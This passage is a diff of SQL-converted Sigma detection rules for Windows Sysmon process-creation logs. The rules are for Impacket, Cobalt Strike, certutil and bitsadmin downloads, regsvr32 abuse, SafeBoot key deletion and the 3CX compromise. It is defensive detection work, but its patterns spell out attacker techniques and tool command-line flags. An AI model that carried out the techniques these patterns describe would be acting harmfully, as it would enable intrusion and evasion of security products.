'\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and 
then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects creation of a scheduled task with a GUID like name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software naming their tasks as GUIDs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "Renamed PAExec 
Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE 
'\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND 
(ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", - "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", + "status": "test", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', 
'3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Griffon Malware Attack Pattern", + "id": 
"bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". 
Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE 
'\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "status": "test", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Administrative findstr usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' 